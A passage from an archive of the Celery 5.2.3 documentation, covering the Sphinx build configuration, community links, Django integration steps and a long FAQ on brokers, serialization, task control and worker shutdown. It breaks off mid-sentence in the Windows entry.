celery-5.2.3/docs/_templates/0000775000175000017500000000000000000000000015762 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_templates/sidebardonations.html0000664000175000017500000000074600000000000022207 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/changelog.rst0000664000175000017500000000003600000000000016305 0ustar00asifasif00000000000000.. include:: ../Changelog.rst ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/community.rst0000664000175000017500000000172500000000000016410 0ustar00asifasif00000000000000.. _community: ======================= Community Resources ======================= This is a list of external blog posts, tutorials, and slides related to Celery. If you have a link that's missing from this list, please contact the mailing-list or submit a patch. .. contents:: :local: .. _community-resources: Resources ========= .. _res-using-celery: Who's using Celery ------------------ https://github.com/celery/celery/wiki#companieswebsites-using-celery .. _res-wiki: Wiki ---- https://github.com/celery/celery/wiki .. _res-stackoverflow: Celery questions on Stack Overflow ---------------------------------- https://stackoverflow.com/search?q=celery&tab=newest .. _res-mailing-list-archive: Mailing-list Archive: celery-users ---------------------------------- http://blog.gmane.org/gmane.comp.python.amqp.celery.user .. _res-irc-logs: .. _community-news: News ==== This section has moved to the Celery homepage: http://celeryproject.org/community/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/conf.py0000664000175000017500000000505200000000000015126 0ustar00asifasif00000000000000from sphinx_celery import conf globals().update(conf.build_config( 'celery', __file__, project='Celery', version_dev='6.0', version_stable='5.0', canonical_url='http://docs.celeryproject.org', webdomain='celeryproject.org', github_project='celery/celery', author='Ask Solem & contributors', author_name='Ask Solem', copyright='2009-2021', publisher='Celery Project', html_logo='images/celery_512.png', html_favicon='images/favicon.ico', html_prepend_sidebars=['sidebardonations.html'], extra_extensions=[ 'sphinx_click', 'sphinx.ext.napoleon', 'celery.contrib.sphinx', 'celerydocs', ], extra_intersphinx_mapping={ 'cyanide': ('https://cyanide.readthedocs.io/en/latest', None), 'click': ('https://click.palletsprojects.com/en/7.x/', None), }, apicheck_ignore_modules=[ 'celery.__main__', 'celery.contrib.testing', 'celery.contrib.testing.tasks', 'celery.bin', 'celery.bin.celeryd_detach', 'celery.contrib', r'celery.fixups.*', 'celery.local', 'celery.app.base', 'celery.apps', 'celery.canvas', 'celery.concurrency.asynpool', 'celery.utils.encoding', r'celery.utils.static.*', ], linkcheck_ignore=[ r'^http://localhost' ], autodoc_mock_imports=[ 'riak' ] )) settings = {} ignored_settings = { # Deprecated broker settings (replaced by broker_url) 'broker_host', 'broker_user', 'broker_password', 'broker_vhost', 'broker_port', 'broker_transport', # deprecated task settings. 'chord_propagates', # MongoDB settings replaced by URL config., 'mongodb_backend_settings', # Database URL replaced by URL config (result_backend = db+...). 'database_url', # Redis settings replaced by URL config. 'redis_host', 'redis_port', 'redis_db', 'redis_password', # Old deprecated AMQP result backend. 'result_exchange', 'result_exchange_type', # Experimental 'worker_agent', # Deprecated worker settings. 'worker_pool_putlocks', } def configcheck_project_settings(): from celery.app.defaults import NAMESPACES, flatten settings.update(dict(flatten(NAMESPACES))) return set(settings) def is_deprecated_setting(setting): try: return settings[setting].deprecate_by except KeyError: pass def configcheck_should_ignore(setting): return setting in ignored_settings or is_deprecated_setting(setting) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/configuration.html0000664000175000017500000000012300000000000017356 0ustar00asifasif00000000000000Moved ===== This document has now moved into the userguide: :ref:`configuration` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/contributing.rst0000664000175000017500000000004100000000000017061 0ustar00asifasif00000000000000.. include:: ../CONTRIBUTING.rst ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/copyright.rst0000664000175000017500000000164300000000000016373 0ustar00asifasif00000000000000Copyright ========= *Celery User Manual* by Ask Solem .. |copy| unicode:: U+000A9 .. COPYRIGHT SIGN Copyright |copy| 2009-2016, Ask Solem. All rights reserved. This material may be copied or distributed only subject to the terms and conditions set forth in the `Creative Commons Attribution-ShareAlike 4.0 International` `_ license. You may share and adapt the material, even for commercial purposes, but you must give the original author credit. If you alter, transform, or build upon this work, you may distribute the resulting work only under the same license or a license compatible to this one. .. note:: While the *Celery* documentation is offered under the Creative Commons *Attribution-ShareAlike 4.0 International* license the Celery *software* is offered under the `BSD License (3 Clause) `_ ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5477524 celery-5.2.3/docs/django/0000775000175000017500000000000000000000000015067 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/django/first-steps-with-django.rst0000664000175000017500000001732000000000000022320 0ustar00asifasif00000000000000.. _django-first-steps: ========================= First steps with Django ========================= Using Celery with Django ======================== .. note:: Previous versions of Celery required a separate library to work with Django, but since 3.1 this is no longer the case. Django is supported out of the box now so this document only contains a basic way to integrate Celery and Django. You'll use the same API as non-Django users so you're recommended to read the :ref:`first-steps` tutorial first and come back to this tutorial. When you have a working example you can continue to the :ref:`next-steps` guide. .. note:: Celery 5.0.x supports Django 1.11 LTS or newer versions. Please use Celery 4.4.x for versions older than Django 1.11. To use Celery with your Django project you must first define an instance of the Celery library (called an "app") If you have a modern Django project layout like:: - proj/ - manage.py - proj/ - __init__.py - settings.py - urls.py then the recommended way is to create a new `proj/proj/celery.py` module that defines the Celery instance: :file: `proj/proj/celery.py` .. literalinclude:: ../../examples/django/proj/celery.py Then you need to import this app in your :file:`proj/proj/__init__.py` module. This ensures that the app is loaded when Django starts so that the ``@shared_task`` decorator (mentioned later) will use it: :file:`proj/proj/__init__.py`: .. literalinclude:: ../../examples/django/proj/__init__.py Note that this example project layout is suitable for larger projects, for simple projects you may use a single contained module that defines both the app and tasks, like in the :ref:`tut-celery` tutorial. Let's break down what happens in the first module, first, we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment variable for the :program:`celery` command-line program: .. code-block:: python os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') You don't need this line, but it saves you from always passing in the settings module to the ``celery`` program. It must always come before creating the app instances, as is what we do next: .. code-block:: python app = Celery('proj') This is our instance of the library, you can have many instances but there's probably no reason for that when using Django. We also add the Django settings module as a configuration source for Celery. This means that you don't have to use multiple configuration files, and instead configure Celery directly from the Django settings; but you can also separate them if wanted. .. code-block:: python app.config_from_object('django.conf:settings', namespace='CELERY') The uppercase name-space means that all :ref:`Celery configuration options ` must be specified in uppercase instead of lowercase, and start with ``CELERY_``, so for example the :setting:`task_always_eager` setting becomes ``CELERY_TASK_ALWAYS_EAGER``, and the :setting:`broker_url` setting becomes ``CELERY_BROKER_URL``. This also applies to the workers settings, for instance, the :setting:`worker_concurrency` setting becomes ``CELERY_WORKER_CONCURRENCY``. For example, a Django project's configuration file might include: .. code-block:: python :caption: settings.py ... # Celery Configuration Options CELERY_TIMEZONE = "Australia/Tasmania" CELERY_TASK_TRACK_STARTED = True CELERY_TASK_TIME_LIMIT = 30 * 60 You can pass the settings object directly instead, but using a string is better since then the worker doesn't have to serialize the object. The ``CELERY_`` namespace is also optional, but recommended (to prevent overlap with other Django settings). Next, a common practice for reusable apps is to define all tasks in a separate ``tasks.py`` module, and Celery does have a way to auto-discover these modules: .. code-block:: python app.autodiscover_tasks() With the line above Celery will automatically discover tasks from all of your installed apps, following the ``tasks.py`` convention:: - app1/ - tasks.py - models.py - app2/ - tasks.py - models.py This way you don't have to manually add the individual modules to the :setting:`CELERY_IMPORTS ` setting. Finally, the ``debug_task`` example is a task that dumps its own request information. This is using the new ``bind=True`` task option introduced in Celery 3.1 to easily refer to the current task instance. Using the ``@shared_task`` decorator ------------------------------------ The tasks you write will probably live in reusable apps, and reusable apps cannot depend on the project itself, so you also cannot import your app instance directly. The ``@shared_task`` decorator lets you create tasks without having any concrete app instance: :file:`demoapp/tasks.py`: .. literalinclude:: ../../examples/django/demoapp/tasks.py .. seealso:: You can find the full source code for the Django example project at: https://github.com/celery/celery/tree/master/examples/django/ Extensions ========== .. _django-celery-results: ``django-celery-results`` - Using the Django ORM/Cache as a result backend -------------------------------------------------------------------------- The :pypi:`django-celery-results` extension provides result backends using either the Django ORM, or the Django Cache framework. To use this with your project you need to follow these steps: #. Install the :pypi:`django-celery-results` library: .. code-block:: console $ pip install django-celery-results #. Add ``django_celery_results`` to ``INSTALLED_APPS`` in your Django project's :file:`settings.py`:: INSTALLED_APPS = ( ..., 'django_celery_results', ) Note that there is no dash in the module name, only underscores. #. Create the Celery database tables by performing a database migrations: .. code-block:: console $ python manage.py migrate django_celery_results #. Configure Celery to use the :pypi:`django-celery-results` backend. Assuming you are using Django's :file:`settings.py` to also configure Celery, add the following settings: .. code-block:: python CELERY_RESULT_BACKEND = 'django-db' For the cache backend you can use: .. code-block:: python CELERY_CACHE_BACKEND = 'django-cache' We can also use the cache defined in the CACHES setting in django. .. code-block:: python # celery setting. CELERY_CACHE_BACKEND = 'default' # django setting. CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', } } For additional configuration options, view the :ref:`conf-result-backend` reference. ``django-celery-beat`` - Database-backed Periodic Tasks with Admin interface. ----------------------------------------------------------------------------- See :ref:`beat-custom-schedulers` for more information. Starting the worker process =========================== In a production environment you'll want to run the worker in the background as a daemon - see :ref:`daemonizing` - but for testing and development it is useful to be able to start a worker instance by using the :program:`celery worker` manage command, much as you'd use Django's :command:`manage.py runserver`: .. code-block:: console $ celery -A proj worker -l INFO For a complete listing of the command-line options available, use the help command: .. code-block:: console $ celery help Where to go from here ===================== If you want to learn more you should continue to the :ref:`Next Steps ` tutorial, and after that you can study the :ref:`User Guide `. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/django/index.rst0000664000175000017500000000021100000000000016722 0ustar00asifasif00000000000000.. _django: ========= Django ========= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 first-steps-with-django ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/faq.rst0000664000175000017500000007214000000000000015132 0ustar00asifasif00000000000000.. _faq: ============================ Frequently Asked Questions ============================ .. contents:: :local: .. _faq-general: General ======= .. _faq-when-to-use: What kinds of things should I use Celery for? --------------------------------------------- **Answer:** `Queue everything and delight everyone`_ is a good article describing why you'd use a queue in a web context. .. _`Queue everything and delight everyone`: https://decafbad.com/blog/2008/07/04/queue-everything-and-delight-everyone These are some common use cases: * Running something in the background. For example, to finish the web request as soon as possible, then update the users page incrementally. This gives the user the impression of good performance and "snappiness", even though the real work might actually take some time. * Running something after the web request has finished. * Making sure something is done, by executing it asynchronously and using retries. * Scheduling periodic work. And to some degree: * Distributed computing. * Parallel execution. .. _faq-misconceptions: Misconceptions ============== .. _faq-loc: Does Celery really consist of 50.000 lines of code? --------------------------------------------------- **Answer:** No, this and similarly large numbers have been reported at various locations. The numbers as of this writing are: - core: 7,141 lines of code. - tests: 14,209 lines. - backends, contrib, compat utilities: 9,032 lines. Lines of code isn't a useful metric, so even if Celery did consist of 50k lines of code you wouldn't be able to draw any conclusions from such a number. Does Celery have many dependencies? ----------------------------------- A common criticism is that Celery uses too many dependencies. The rationale behind such a fear is hard to imagine, especially considering code reuse as the established way to combat complexity in modern software development, and that the cost of adding dependencies is very low now that package managers like pip and PyPI makes the hassle of installing and maintaining dependencies a thing of the past. Celery has replaced several dependencies along the way, and the current list of dependencies are: celery ~~~~~~ - :pypi:`kombu` Kombu is part of the Celery ecosystem and is the library used to send and receive messages. It's also the library that enables us to support many different message brokers. It's also used by the OpenStack project, and many others, validating the choice to separate it from the Celery code-base. - :pypi:`billiard` Billiard is a fork of the Python multiprocessing module containing many performance and stability improvements. It's an eventual goal that these improvements will be merged back into Python one day. It's also used for compatibility with older Python versions that don't come with the multiprocessing module. - :pypi:`pytz` The pytz module provides timezone definitions and related tools. kombu ~~~~~ Kombu depends on the following packages: - :pypi:`amqp` The underlying pure-Python amqp client implementation. AMQP being the default broker this is a natural dependency. .. note:: To handle the dependencies for popular configuration choices Celery defines a number of "bundle" packages, see :ref:`bundles`. .. _faq-heavyweight: Is Celery heavy-weight? ----------------------- Celery poses very little overhead both in memory footprint and performance. But please note that the default configuration isn't optimized for time nor space, see the :ref:`guide-optimizing` guide for more information. .. _faq-serialization-is-a-choice: Is Celery dependent on pickle? ------------------------------ **Answer:** No, Celery can support any serialization scheme. We have built-in support for JSON, YAML, Pickle, and msgpack. Every task is associated with a content type, so you can even send one task using pickle, another using JSON. The default serialization support used to be pickle, but since 4.0 the default is now JSON. If you require sending complex Python objects as task arguments, you can use pickle as the serialization format, but see notes in :ref:`security-serializers`. If you need to communicate with other languages you should use a serialization format suited to that task, which pretty much means any serializer that's not pickle. You can set a global default serializer, the default serializer for a particular Task, or even what serializer to use when sending a single task instance. .. _faq-is-celery-for-django-only: Is Celery for Django only? -------------------------- **Answer:** No, you can use Celery with any framework, web or otherwise. .. _faq-is-celery-for-rabbitmq-only: Do I have to use AMQP/RabbitMQ? ------------------------------- **Answer**: No, although using RabbitMQ is recommended you can also use Redis, SQS, or Qpid. See :ref:`brokers` for more information. Redis as a broker won't perform as well as an AMQP broker, but the combination RabbitMQ as broker and Redis as a result store is commonly used. If you have strict reliability requirements you're encouraged to use RabbitMQ or another AMQP broker. Some transports also use polling, so they're likely to consume more resources. However, if you for some reason aren't able to use AMQP, feel free to use these alternatives. They will probably work fine for most use cases, and note that the above points are not specific to Celery; If using Redis/database as a queue worked fine for you before, it probably will now. You can always upgrade later if you need to. .. _faq-is-celery-multilingual: Is Celery multilingual? ------------------------ **Answer:** Yes. :mod:`~celery.bin.worker` is an implementation of Celery in Python. If the language has an AMQP client, there shouldn't be much work to create a worker in your language. A Celery worker is just a program connecting to the broker to process messages. Also, there's another way to be language-independent, and that's to use REST tasks, instead of your tasks being functions, they're URLs. With this information you can even create simple web servers that enable preloading of code. Simply expose an endpoint that performs an operation, and create a task that just performs an HTTP request to that endpoint. You can also use `Flower's `_ `REST API `_ to invoke tasks. .. _faq-troubleshooting: Troubleshooting =============== .. _faq-mysql-deadlocks: MySQL is throwing deadlock errors, what can I do? ------------------------------------------------- **Answer:** MySQL has default isolation level set to `REPEATABLE-READ`, if you don't really need that, set it to `READ-COMMITTED`. You can do that by adding the following to your :file:`my.cnf`:: [mysqld] transaction-isolation = READ-COMMITTED For more information about InnoDB`s transaction model see `MySQL - The InnoDB Transaction Model and Locking`_ in the MySQL user manual. (Thanks to Honza Kral and Anton Tsigularov for this solution) .. _`MySQL - The InnoDB Transaction Model and Locking`: https://dev.mysql.com/doc/refman/5.1/en/innodb-transaction-model.html .. _faq-worker-hanging: The worker isn't doing anything, just hanging --------------------------------------------- **Answer:** See `MySQL is throwing deadlock errors, what can I do?`_, or `Why is Task.delay/apply\*/the worker just hanging?`_. .. _faq-results-unreliable: Task results aren't reliably returning -------------------------------------- **Answer:** If you're using the database backend for results, and in particular using MySQL, see `MySQL is throwing deadlock errors, what can I do?`_. .. _faq-publish-hanging: Why is Task.delay/apply\*/the worker just hanging? -------------------------------------------------- **Answer:** There's a bug in some AMQP clients that'll make it hang if it's not able to authenticate the current user, the password doesn't match or the user doesn't have access to the virtual host specified. Be sure to check your broker logs (for RabbitMQ that's :file:`/var/log/rabbitmq/rabbit.log` on most systems), it usually contains a message describing the reason. .. _faq-worker-on-freebsd: Does it work on FreeBSD? ------------------------ **Answer:** Depends; When using the RabbitMQ (AMQP) and Redis transports it should work out of the box. For other transports the compatibility prefork pool is used and requires a working POSIX semaphore implementation, this is enabled in FreeBSD by default since FreeBSD 8.x. For older version of FreeBSD, you have to enable POSIX semaphores in the kernel and manually recompile billiard. Luckily, Viktor Petersson has written a tutorial to get you started with Celery on FreeBSD here: http://www.playingwithwire.com/2009/10/how-to-get-celeryd-to-work-on-freebsd/ .. _faq-duplicate-key-errors: I'm having `IntegrityError: Duplicate Key` errors. Why? --------------------------------------------------------- **Answer:** See `MySQL is throwing deadlock errors, what can I do?`_. Thanks to :github_user:`@howsthedotcom`. .. _faq-worker-stops-processing: Why aren't my tasks processed? ------------------------------ **Answer:** With RabbitMQ you can see how many consumers are currently receiving tasks by running the following command: .. code-block:: console $ rabbitmqctl list_queues -p name messages consumers Listing queues ... celery 2891 2 This shows that there's 2891 messages waiting to be processed in the task queue, and there are two consumers processing them. One reason that the queue is never emptied could be that you have a stale worker process taking the messages hostage. This could happen if the worker wasn't properly shut down. When a message is received by a worker the broker waits for it to be acknowledged before marking the message as processed. The broker won't re-send that message to another consumer until the consumer is shut down properly. If you hit this problem you have to kill all workers manually and restart them: .. code-block:: console $ pkill 'celery worker' $ # - If you don't have pkill use: $ # ps auxww | awk '/celery worker/ {print $2}' | xargs kill You may have to wait a while until all workers have finished executing tasks. If it's still hanging after a long time you can kill them by force with: .. code-block:: console $ pkill -9 'celery worker' $ # - If you don't have pkill use: $ # ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9 .. _faq-task-does-not-run: Why won't my Task run? ---------------------- **Answer:** There might be syntax errors preventing the tasks module being imported. You can find out if Celery is able to run the task by executing the task manually: .. code-block:: python >>> from myapp.tasks import MyPeriodicTask >>> MyPeriodicTask.delay() Watch the workers log file to see if it's able to find the task, or if some other error is happening. .. _faq-periodic-task-does-not-run: Why won't my periodic task run? ------------------------------- **Answer:** See `Why won't my Task run?`_. .. _faq-purge-the-queue: How do I purge all waiting tasks? --------------------------------- **Answer:** You can use the ``celery purge`` command to purge all configured task queues: .. code-block:: console $ celery -A proj purge or programmatically: .. code-block:: pycon >>> from proj.celery import app >>> app.control.purge() 1753 If you only want to purge messages from a specific queue you have to use the AMQP API or the :program:`celery amqp` utility: .. code-block:: console $ celery -A proj amqp queue.purge The number 1753 is the number of messages deleted. You can also start the worker with the :option:`--purge ` option enabled to purge messages when the worker starts. .. _faq-messages-left-after-purge: I've purged messages, but there are still messages left in the queue? --------------------------------------------------------------------- **Answer:** Tasks are acknowledged (removed from the queue) as soon as they're actually executed. After the worker has received a task, it will take some time until it's actually executed, especially if there are a lot of tasks already waiting for execution. Messages that aren't acknowledged are held on to by the worker until it closes the connection to the broker (AMQP server). When that connection is closed (e.g., because the worker was stopped) the tasks will be re-sent by the broker to the next available worker (or the same worker when it has been restarted), so to properly purge the queue of waiting tasks you have to stop all the workers, and then purge the tasks using :func:`celery.control.purge`. .. _faq-results: Results ======= .. _faq-get-result-by-task-id: How do I get the result of a task if I have the ID that points there? ---------------------------------------------------------------------- **Answer**: Use `task.AsyncResult`: .. code-block:: pycon >>> result = my_task.AsyncResult(task_id) >>> result.get() This will give you a :class:`~celery.result.AsyncResult` instance using the tasks current result backend. If you need to specify a custom result backend, or you want to use the current application's default backend you can use :class:`@AsyncResult`: .. code-block:: pycon >>> result = app.AsyncResult(task_id) >>> result.get() .. _faq-security: Security ======== Isn't using `pickle` a security concern? ---------------------------------------- **Answer**: Indeed, since Celery 4.0 the default serializer is now JSON to make sure people are choosing serializers consciously and aware of this concern. It's essential that you protect against unauthorized access to your broker, databases and other services transmitting pickled data. Note that this isn't just something you should be aware of with Celery, for example also Django uses pickle for its cache client. For the task messages you can set the :setting:`task_serializer` setting to "json" or "yaml" instead of pickle. Similarly for task results you can set :setting:`result_serializer`. For more details of the formats used and the lookup order when checking what format to use for a task see :ref:`calling-serializers` Can messages be encrypted? -------------------------- **Answer**: Some AMQP brokers supports using SSL (including RabbitMQ). You can enable this using the :setting:`broker_use_ssl` setting. It's also possible to add additional encryption and security to messages, if you have a need for this then you should contact the :ref:`mailing-list`. Is it safe to run :program:`celery worker` as root? --------------------------------------------------- **Answer**: No! We're not currently aware of any security issues, but it would be incredibly naive to assume that they don't exist, so running the Celery services (:program:`celery worker`, :program:`celery beat`, :program:`celeryev`, etc) as an unprivileged user is recommended. .. _faq-brokers: Brokers ======= Why is RabbitMQ crashing? ------------------------- **Answer:** RabbitMQ will crash if it runs out of memory. This will be fixed in a future release of RabbitMQ. please refer to the RabbitMQ FAQ: https://www.rabbitmq.com/faq.html#node-runs-out-of-memory .. note:: This is no longer the case, RabbitMQ versions 2.0 and above includes a new persister, that's tolerant to out of memory errors. RabbitMQ 2.1 or higher is recommended for Celery. If you're still running an older version of RabbitMQ and experience crashes, then please upgrade! Misconfiguration of Celery can eventually lead to a crash on older version of RabbitMQ. Even if it doesn't crash, this can still consume a lot of resources, so it's important that you're aware of the common pitfalls. * Events. Running :mod:`~celery.bin.worker` with the :option:`-E ` option will send messages for events happening inside of the worker. Events should only be enabled if you have an active monitor consuming them, or if you purge the event queue periodically. * AMQP backend results. When running with the AMQP result backend, every task result will be sent as a message. If you don't collect these results, they will build up and RabbitMQ will eventually run out of memory. This result backend is now deprecated so you shouldn't be using it. Use either the RPC backend for rpc-style calls, or a persistent backend if you need multi-consumer access to results. Results expire after 1 day by default. It may be a good idea to lower this value by configuring the :setting:`result_expires` setting. If you don't use the results for a task, make sure you set the `ignore_result` option: .. code-block:: python @app.task(ignore_result=True) def mytask(): pass class MyTask(Task): ignore_result = True .. _faq-use-celery-with-stomp: Can I use Celery with ActiveMQ/STOMP? ------------------------------------- **Answer**: No. It used to be supported by :pypi:`Carrot` (our old messaging library) but isn't currently supported in :pypi:`Kombu` (our new messaging library). .. _faq-non-amqp-missing-features: What features aren't supported when not using an AMQP broker? ------------------------------------------------------------- This is an incomplete list of features not available when using the virtual transports: * Remote control commands (supported only by Redis). * Monitoring with events may not work in all virtual transports. * The `header` and `fanout` exchange types (`fanout` is supported by Redis). .. _faq-tasks: Tasks ===== .. _faq-tasks-connection-reuse: How can I reuse the same connection when calling tasks? ------------------------------------------------------- **Answer**: See the :setting:`broker_pool_limit` setting. The connection pool is enabled by default since version 2.5. .. _faq-sudo-subprocess: :command:`sudo` in a :mod:`subprocess` returns :const:`None` ------------------------------------------------------------ There's a :command:`sudo` configuration option that makes it illegal for process without a tty to run :command:`sudo`: .. code-block:: text Defaults requiretty If you have this configuration in your :file:`/etc/sudoers` file then tasks won't be able to call :command:`sudo` when the worker is running as a daemon. If you want to enable that, then you need to remove the line from :file:`/etc/sudoers`. See: http://timelordz.com/wiki/Apache_Sudo_Commands .. _faq-deletes-unknown-tasks: Why do workers delete tasks from the queue if they're unable to process them? ----------------------------------------------------------------------------- **Answer**: The worker rejects unknown tasks, messages with encoding errors and messages that don't contain the proper fields (as per the task message protocol). If it didn't reject them they could be redelivered again and again, causing a loop. Recent versions of RabbitMQ has the ability to configure a dead-letter queue for exchange, so that rejected messages is moved there. .. _faq-execute-task-by-name: Can I call a task by name? ----------------------------- **Answer**: Yes, use :meth:`@send_task`. You can also call a task by name, from any language, using an AMQP client: .. code-block:: python >>> app.send_task('tasks.add', args=[2, 2], kwargs={}) To use ``chain``, ``chord`` or ``group`` with tasks called by name, use the :meth:`@Celery.signature` method: .. code-block:: python >>> chain( ... app.signature('tasks.add', args=[2, 2], kwargs={}), ... app.signature('tasks.add', args=[1, 1], kwargs={}) ... ).apply_async() .. _faq-get-current-task-id: Can I get the task id of the current task? ---------------------------------------------- **Answer**: Yes, the current id and more is available in the task request:: @app.task(bind=True) def mytask(self): cache.set(self.request.id, "Running") For more information see :ref:`task-request-info`. If you don't have a reference to the task instance you can use :attr:`app.current_task <@current_task>`: .. code-block:: python >>> app.current_task.request.id But note that this will be any task, be it one executed by the worker, or a task called directly by that task, or a task called eagerly. To get the current task being worked on specifically, use :attr:`app.current_worker_task <@current_worker_task>`: .. code-block:: python >>> app.current_worker_task.request.id .. note:: Both :attr:`~@current_task`, and :attr:`~@current_worker_task` can be :const:`None`. .. _faq-custom-task-ids: Can I specify a custom task_id? ------------------------------- **Answer**: Yes, use the `task_id` argument to :meth:`Task.apply_async`: .. code-block:: pycon >>> task.apply_async(args, kwargs, task_id='…') Can I use decorators with tasks? -------------------------------- **Answer**: Yes, but please see note in the sidebar at :ref:`task-basics`. .. _faq-natural-task-ids: Can I use natural task ids? --------------------------- **Answer**: Yes, but make sure it's unique, as the behavior for two tasks existing with the same id is undefined. The world will probably not explode, but they can definitely overwrite each others results. .. _faq-task-callbacks: Can I run a task once another task has finished? ------------------------------------------------ **Answer**: Yes, you can safely launch a task inside a task. A common pattern is to add callbacks to tasks: .. code-block:: python from celery.utils.log import get_task_logger logger = get_task_logger(__name__) @app.task def add(x, y): return x + y @app.task(ignore_result=True) def log_result(result): logger.info("log_result got: %r", result) Invocation: .. code-block:: pycon >>> (add.s(2, 2) | log_result.s()).delay() See :doc:`userguide/canvas` for more information. .. _faq-cancel-task: Can I cancel the execution of a task? ------------------------------------- **Answer**: Yes, Use :meth:`result.revoke() `: .. code-block:: pycon >>> result = add.apply_async(args=[2, 2], countdown=120) >>> result.revoke() or if you only have the task id: .. code-block:: pycon >>> from proj.celery import app >>> app.control.revoke(task_id) The latter also support passing a list of task-ids as argument. .. _faq-node-not-receiving-broadcast-commands: Why aren't my remote control commands received by all workers? -------------------------------------------------------------- **Answer**: To receive broadcast remote control commands, every worker node creates a unique queue name, based on the nodename of the worker. If you have more than one worker with the same host name, the control commands will be received in round-robin between them. To work around this you can explicitly set the nodename for every worker using the :option:`-n ` argument to :mod:`~celery.bin.worker`: .. code-block:: console $ celery -A proj worker -n worker1@%h $ celery -A proj worker -n worker2@%h where ``%h`` expands into the current hostname. .. _faq-task-routing: Can I send some tasks to only some servers? -------------------------------------------- **Answer:** Yes, you can route tasks to one or more workers, using different message routing topologies, and a worker instance can bind to multiple queues. See :doc:`userguide/routing` for more information. .. _faq-disable-prefetch: Can I disable prefetching of tasks? ----------------------------------- **Answer**: Maybe! The AMQP term "prefetch" is confusing, as it's only used to describe the task prefetching *limit*. There's no actual prefetching involved. Disabling the prefetch limits is possible, but that means the worker will consume as many tasks as it can, as fast as possible. A discussion on prefetch limits, and configuration settings for a worker that only reserves one task at a time is found here: :ref:`optimizing-prefetch-limit`. .. _faq-change-periodic-task-interval-at-runtime: Can I change the interval of a periodic task at runtime? -------------------------------------------------------- **Answer**: Yes, you can use the Django database scheduler, or you can create a new schedule subclass and override :meth:`~celery.schedules.schedule.is_due`: .. code-block:: python from celery.schedules import schedule class my_schedule(schedule): def is_due(self, last_run_at): return run_now, next_time_to_check .. _faq-task-priorities: Does Celery support task priorities? ------------------------------------ **Answer**: Yes, RabbitMQ supports priorities since version 3.5.0, and the Redis transport emulates priority support. You can also prioritize work by routing high priority tasks to different workers. In the real world this usually works better than per message priorities. You can use this in combination with rate limiting, and per message priorities to achieve a responsive system. .. _faq-acks_late-vs-retry: Should I use retry or acks_late? -------------------------------- **Answer**: Depends. It's not necessarily one or the other, you may want to use both. `Task.retry` is used to retry tasks, notably for expected errors that is catch-able with the :keyword:`try` block. The AMQP transaction isn't used for these errors: **if the task raises an exception it's still acknowledged!** The `acks_late` setting would be used when you need the task to be executed again if the worker (for some reason) crashes mid-execution. It's important to note that the worker isn't known to crash, and if it does it's usually an unrecoverable error that requires human intervention (bug in the worker, or task code). In an ideal world you could safely retry any task that's failed, but this is rarely the case. Imagine the following task: .. code-block:: python @app.task def process_upload(filename, tmpfile): # Increment a file count stored in a database increment_file_counter() add_file_metadata_to_db(filename, tmpfile) copy_file_to_destination(filename, tmpfile) If this crashed in the middle of copying the file to its destination the world would contain incomplete state. This isn't a critical scenario of course, but you can probably imagine something far more sinister. So for ease of programming we have less reliability; It's a good default, users who require it and know what they are doing can still enable acks_late (and in the future hopefully use manual acknowledgment). In addition `Task.retry` has features not available in AMQP transactions: delay between retries, max retries, etc. So use retry for Python errors, and if your task is idempotent combine that with `acks_late` if that level of reliability is required. .. _faq-schedule-at-specific-time: Can I schedule tasks to execute at a specific time? --------------------------------------------------- **Answer**: Yes. You can use the `eta` argument of :meth:`Task.apply_async`. See also :ref:`guide-beat`. .. _faq-safe-worker-shutdown: Can I safely shut down the worker? ---------------------------------- **Answer**: Yes, use the :sig:`TERM` signal. This will tell the worker to finish all currently executing jobs and shut down as soon as possible. No tasks should be lost even with experimental transports as long as the shutdown completes. You should never stop :mod:`~celery.bin.worker` with the :sig:`KILL` signal (``kill -9``), unless you've tried :sig:`TERM` a few times and waited a few minutes to let it get a chance to shut down. Also make sure you kill the main worker process only, not any of its child processes. You can direct a kill signal to a specific child process if you know the process is currently executing a task the worker shutdown is depending on, but this also means that a ``WorkerLostError`` state will be set for the task so the task won't run again. Identifying the type of process is easier if you have installed the :pypi:`setproctitle` module: .. code-block:: console $ pip install setproctitle With this library installed you'll be able to see the type of process in :command:`ps` listings, but the worker must be restarted for this to take effect. .. seealso:: :ref:`worker-stopping` .. _faq-daemonizing: Can I run the worker in the background on [platform]? ----------------------------------------------------- **Answer**: Yes, please see :ref:`daemonizing`. .. _faq-django: Django ====== .. _faq-django-beat-database-tables: What purpose does the database tables created by ``django-celery-beat`` have? ----------------------------------------------------------------------------- When the database-backed schedule is used the periodic task schedule is taken from the ``PeriodicTask`` model, there are also several other helper tables (``IntervalSchedule``, ``CrontabSchedule``, ``PeriodicTasks``). .. _faq-django-result-database-tables: What purpose does the database tables created by ``django-celery-results`` have? -------------------------------------------------------------------------------- The Django database result backend extension requires two extra models: ``TaskResult`` and ``GroupResult``. .. _faq-windows: Windows ======= .. _faq-windows-worker-embedded-beat: Does Celery support Windows? ---------------------------------------------------------------- **Answer**: No. Since Celery 4.x, Windows is no longer 